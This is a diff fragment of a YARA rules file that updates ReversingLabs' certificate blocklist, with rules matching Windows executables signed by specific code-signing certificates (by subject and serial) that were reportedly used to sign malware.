+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "653aff6f3913f1bf51e90e7a835dbb5441457175797cefdddd234a6c2c0f11ad"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20095,21 +44760,21 @@ rule REVERSINGLABS_Cert_Blocklist_3F15C3 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Certified Software" and pe.signatures [ i ] . serial == "3f:15:c3" and 1110577130 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Giperion" and pe.signatures [ i ] . serial == "65:cd:32:3c:24:83:66:8b:90:a4:4a:71:1d:2a:6b:98" and 1602547200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_285Eccbd1D0000E640B84307Ef88Cd9F : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_5A17D5De74Fd8F09Df596Df3123139Bb : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "4dc1523f-edc8-52e2-99aa-7389c0eb5e54"
+		id = "4a3ffa4a-c080-5d76-9655-010cde091ae2"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L15536-L15552"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "267df1c327b65938b2b82a53ec8345290659560c69c9a70f2866fe7bd73513a7"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L8548-L8564"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "7ed62740fe191d961ad32b2a79463cc9cbce557ea757e413860f7b4974904c03"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20119,21 +44784,21 @@ rule REVERSINGLABS_Cert_Blocklist_285Eccbd1D0000E640B84307Ef88Cd9F : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DRAGON BUSINESS EQUIPMENT LIMITED" and pe.signatures [ i ] . serial == "28:5e:cc:bd:1d:00:00:e6:40:b8:43:07:ef:88:cd:9f" and 1611619200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ACTA FIS d.o.o." and pe.signatures [ i ] . serial == "5a:17:d5:de:74:fd:8f:09:df:59:6d:f3:12:31:39:bb" and 1611273600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_55Ab71A3F9Dde3Ef20C788Dd1D5Ff6C3 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_15Da61D7E1A631803431561674Fb9B90 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "c8b5b632-26e6-5a78-99be-b50b1240dbec"
+		id = "07518dc2-bd6c-5a4c-b537-68f5a462cdc2"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L15554-L15570"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "4bee740eaf359462cd85c6232160c6b1fc3df67acfe731da9978f0b8a304a93f"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L8566-L8582"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "75d2c3b47fe9c863812f2c98fc565af9050b909a03528e2ea4a96542a3ec0c0d"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20143,21 +44808,21 @@ rule REVERSINGLABS_Cert_Blocklist_55Ab71A3F9Dde3Ef20C788Dd1D5Ff6C3 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Zhengzhoushi Tiekelian Information Technology Co.,Ltd" and pe.signatures [ i ] . serial == "55:ab:71:a3:f9:dd:e3:ef:20:c7:88:dd:1d:5f:f6:c3" and 1323907200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "JAY DANCE STUDIO d.o.o." and pe.signatures [ i ] . serial == "15:da:61:d7:e1:a6:31:80:34:31:56:16:74:fb:9b:90" and 1610668800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_4Beca26210737A5442Ff8B47 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_7Ab21306B11Ff280A93Fc445876988Ab : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "30570c07-9ba1-5b7c-a369-c6def80f9dc5"
+		id = "656bb2a6-bb41-5190-af10-280351e64c66"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L15572-L15588"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "7a1130413ae8807dc1ec96a6b1c3bac705a1520f7268db2848b997f6f3f9fc9b"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L8584-L8600"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "0cda954aa807336a6737716d0fa43d696376c240ab7be9d8477baf8800604bf1"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20167,21 +44832,21 @@ rule REVERSINGLABS_Cert_Blocklist_4Beca26210737A5442Ff8B47 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "4b:ec:a2:62:10:73:7a:54:42:ff:8b:47" and 1476437049 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ABC BIOS d.o.o." and pe.signatures [ i ] . serial == "7a:b2:13:06:b1:1f:f2:80:a9:3f:c4:45:87:69:88:ab" and 1611014400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0F203839A9C63B8798A7Cb31 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_634E16E38F12E9A71Aca08E4C6B2Dbb9 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "dc8428f3-ff28-5fcf-9855-f20c68973afe"
+		id = "4aa7bea7-06fb-5d90-bac4-c8ca1ca5c02f"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L15590-L15606"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "604ba3fa671cc98e42caf80d07bc9650d193f898413517b46482f183b0f7008a"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L8602-L8618"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "08950f276e5cf3fe4b5f7421ba671dfd72585aac3bbed7868fdb0e5aa90ec10e"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20191,21 +44856,21 @@ rule REVERSINGLABS_Cert_Blocklist_0F203839A9C63B8798A7Cb31 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "0f:20:38:39:a9:c6:3b:87:98:a7:cb:31" and 1480923809 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AUTO RESPONSE LTD CYF" and pe.signatures [ i ] . serial == "63:4e:16:e3:8f:12:e9:a7:1a:ca:08:e4:c6:b2:db:b9" and 1616112000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Dc992Ea8E6Bb4926931Df656D5Eef8A0 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_289051A83F350A2C600187C99B6C0A73 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "506b217e-ea82-5f14-880e-b6c0cbb001fb"
+		id = "55497d57-7d4f-50e1-85a6-e60786084e3f"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L15608-L15626"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "2b261624677a1c4a1ef539106bedcef30f272fda3d833d4c8095e9797d592e1f"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L8620-L8636"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "cd5d6f95f0cfdbf8d37ea78d061ce00512b6cb7c899152b1640673494d539dd1"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20215,21 +44880,21 @@ rule REVERSINGLABS_Cert_Blocklist_Dc992Ea8E6Bb4926931Df656D5Eef8A0 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MEGAPOLISELIT, OOO" and ( pe.signatures [ i ] . serial == "00:dc:99:2e:a8:e6:bb:49:26:93:1d:f6:56:d5:ee:f8:a0" or pe.signatures [ i ] . serial == "dc:99:2e:a8:e6:bb:49:26:93:1d:f6:56:d5:ee:f8:a0" ) and 1497916800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HALL HAULAGE LTD LTD" and pe.signatures [ i ] . serial == "28:90:51:a8:3f:35:0a:2c:60:01:87:c9:9b:6c:0a:73" and 1616716800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_41Bd49Bb456644D8183B3Dae72Ec8F22 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_818631110B5D14331Dac7E6Ad998B902 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "4645eeae-2aea-59aa-a6bf-095bb9d0d711"
+		id = "6a8f3abd-199c-5e2f-a60e-46e869831445"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L15628-L15644"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "0516af7b27d244f21c9cea62fe599725d412e385e34f5f3f4f618d565365d321"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L8638-L8656"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "5e0de3848adf933632c2eb8cf5ead61d6470237386ba8b48d57a278d99dba324"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20239,21 +44904,21 @@ rule REVERSINGLABS_Cert_Blocklist_41Bd49Bb456644D8183B3Dae72Ec8F22 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xin Zhou" and pe.signatures [ i ] . serial == "41:bd:49:bb:45:66:44:d8:18:3b:3d:ae:72:ec:8f:22" and 1468454400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "2 TOY GUYS LLC" and ( pe.signatures [ i ] . serial == "00:81:86:31:11:0b:5d:14:33:1d:ac:7e:6a:d9:98:b9:02" or pe.signatures [ i ] . serial == "81:86:31:11:0b:5d:14:33:1d:ac:7e:6a:d9:98:b9:02" ) and 1571616000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_A8D40Da6708679C08Aebddea6D3F6B8A : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_277Cd16De5D61B9398B645Afe41C09C7 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "a4224bf1-1875-5b2c-b79d-998d3766d163"
+		id = "d863faac-7b6e-5e1d-960f-8379347c6838"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L15646-L15664"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "27ec32791eaeccb8aa95d023c4fc8943f0435c32d8a17bde98d7d0b02ba17e59"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L8658-L8674"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "696467d699dec060b205f36f53dbe157b241823757d72798b35235d6530fd193"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20263,21 +44928,21 @@ rule REVERSINGLABS_Cert_Blocklist_A8D40Da6708679C08Aebddea6D3F6B8A : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VELES LTD." and ( pe.signatures [ i ] . serial == "00:a8:d4:0d:a6:70:86:79:c0:8a:eb:dd:ea:6d:3f:6b:8a" or pe.signatures [ i ] . serial == "a8:d4:0d:a6:70:86:79:c0:8a:eb:dd:ea:6d:3f:6b:8a" ) and 1547424000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "THE SIGN COMPANY LIMITED" and pe.signatures [ i ] . serial == "27:7c:d1:6d:e5:d6:1b:93:98:b6:45:af:e4:1c:09:c7" and 1619049600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_307642E1F3A92C6Cc2E7Fb6E18F2Ddcb : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_D0Eda76C13D30C97015708790Bb94214 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "6dd35efb-daea-5668-a01d-f5b80371b04c"
+		id = "aa323bac-a9f5-560f-b44a-3cf2b26351bb"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L15666-L15682"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "8c96fbd10672b0b258a80f3abaf0320540c5ff0a4636f011cfe7cfa8ccc482d0"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L8676-L8694"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "2112ebfb7c9ebbbccb20cefcd23bb49142da770feb16ee8eef5eb27646226785"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20287,21 +44952,21 @@ rule REVERSINGLABS_Cert_Blocklist_307642E1F3A92C6Cc2E7Fb6E18F2Ddcb : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "IBM" and pe.signatures [ i ] . serial == "30:76:42:e1:f3:a9:2c:6c:c2:e7:fb:6e:18:f2:dd:cb" and 1500422400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LAEN ApS" and ( pe.signatures [ i ] . serial == "00:d0:ed:a7:6c:13:d3:0c:97:01:57:08:79:0b:b9:42:14" or pe.signatures [ i ] . serial == "d0:ed:a7:6c:13:d3:0c:97:01:57:08:79:0b:b9:42:14" ) and 1619136000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_52379131A1C69263C795A7D398Db0997 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_6333Ed618F88A05B4D82Ad7Bf66Cb0Fa : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "478994c1-c1c4-5f11-b78f-fe237b687bef"
+		id = "c4d3603e-57e2-57df-a055-c43d449242c7"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L15684-L15700"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "245e994024e08add755ec704b895286c115ac00eb5aeecde98fce96f35f6e9e0"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L8696-L8712"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "b088ac4b74a8cf3dddb67c8de2b7c3c5f537287a0454c0030c0eb4069c465c7d"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20311,21 +44976,21 @@ rule REVERSINGLABS_Cert_Blocklist_52379131A1C69263C795A7D398Db0997 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Beijing Caiyunshidai Technology Co., Ltd." and pe.signatures [ i ] . serial == "52:37:91:31:a1:c6:92:63:c7:95:a7:d3:98:db:09:97" and 1476748800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RHM LIMITED" and pe.signatures [ i ] . serial == "63:33:ed:61:8f:88:a0:5b:4d:82:ad:7b:f6:6c:b0:fa" and 1616457600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_44312Cb9A927B4111360762B4D4Bdd6D : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_3B777165B125Bccc181D0Bac3F5B55B3 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "9bc1a8f4-36b7-52bd-9a65-fcd8ec2acf92"
+		id = "f065e99f-9cce-55cb-a592-60b89c26028a"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L15702-L15718"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "8e34636ed815812af478dd01eacd5298fa2cfeb420ee2f45e055f557534cae71"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L8714-L8730"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "80aff3d6f45f5847d5d39b170b9d0e70168d02569ca6d86a2c39150399d290fc"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20335,21 +45000,21 @@ rule REVERSINGLABS_Cert_Blocklist_44312Cb9A927B4111360762B4D4Bdd6D : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BEAR ADAMS CONSULTING LIMITED" and pe.signatures [ i ] . serial == "44:31:2c:b9:a9:27:b4:11:13:60:76:2b:4d:4b:dd:6d" and 1554768000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "STAND ALONE MUSIC LTD" and pe.signatures [ i ] . serial == "3b:77:71:65:b1:25:bc:cc:18:1d:0b:ac:3f:5b:55:b3" and 1607299200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_123A5074069162F4Ed68Fc7D48F464C2 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_5B37Ac3479283B6F9D75Ddf0F8742D06 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "601ddd98-8cd5-5c52-a59a-d4a0556fc316"
+		id = "cc124d3f-2446-57a2-a206-0a5e569fc703"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L15720-L15736"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "f55835c7404edab96bc5c8fe3844f3380f1f6bc8b43da1d51213de899629e8f5"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L8732-L8748"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "b7abd389ac31cd970e6611c7c303714fdd658f45d4857ad524f5e8368edbb875"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20359,21 +45024,21 @@ rule REVERSINGLABS_Cert_Blocklist_123A5074069162F4Ed68Fc7D48F464C2 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yu Bao" and pe.signatures [ i ] . serial == "12:3a:50:74:06:91:62:f4:ed:68:fc:7d:48:f4:64:c2" and 1472428800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ART BOOK PHOTO s.r.o." and pe.signatures [ i ] . serial == "5b:37:ac:34:79:28:3b:6f:9d:75:dd:f0:f8:74:2d:06" and 1619740800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_64Eb04B8Def382B5Efa75F63E0E85Ad0 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_3112C69D460C781Fd649C71E61Bfec82 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "5f4da614-3bc8-5ae8-b04b-e4b3972522ff"
+		id = "f4d2f240-49a7-51f3-8db1-1c569aa63177"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L15738-L15754"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "03adb8a9bf2a8f0633b34d5c39816b47e60b9e598208f7de79ad9d9a7ab8cc5e"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L8750-L8766"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "ed31b0a24d18a451163867f0f49df12af3ca0768f250ac8ce66d41405393130d"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20383,21 +45048,21 @@ rule REVERSINGLABS_Cert_Blocklist_64Eb04B8Def382B5Efa75F63E0E85Ad0 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TOV \"MARIYA\"" and pe.signatures [ i ] . serial == "64:eb:04:b8:de:f3:82:b5:ef:a7:5f:63:e0:e8:5a:d0" and 1535587200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "KREATURHANDLER BJARNE ANDERSEN ApS" and pe.signatures [ i ] . serial == "31:12:c6:9d:46:0c:78:1f:d6:49:c7:1e:61:bf:ec:82" and 1614902400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_76D8D908Eed2F9857Dc5676A680Ceac9 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0A5B4F67Ad8B22Afc2Debe6Ce5F8F679 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "f7eae73e-6b12-5507-846e-d3b409243adf"
+		id = "7dd5ba42-2d04-52d7-b15a-2bdba2e742fb"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L15756-L15772"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "87f9930967d5832d3003672eeb89669b54feed1ca2ea5eec478c50e3cb7a7571"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L8768-L8784"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "938efb7ee19970484aded5cd46b2ff730f8882706bec3f062bdebde3cc9a4799"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
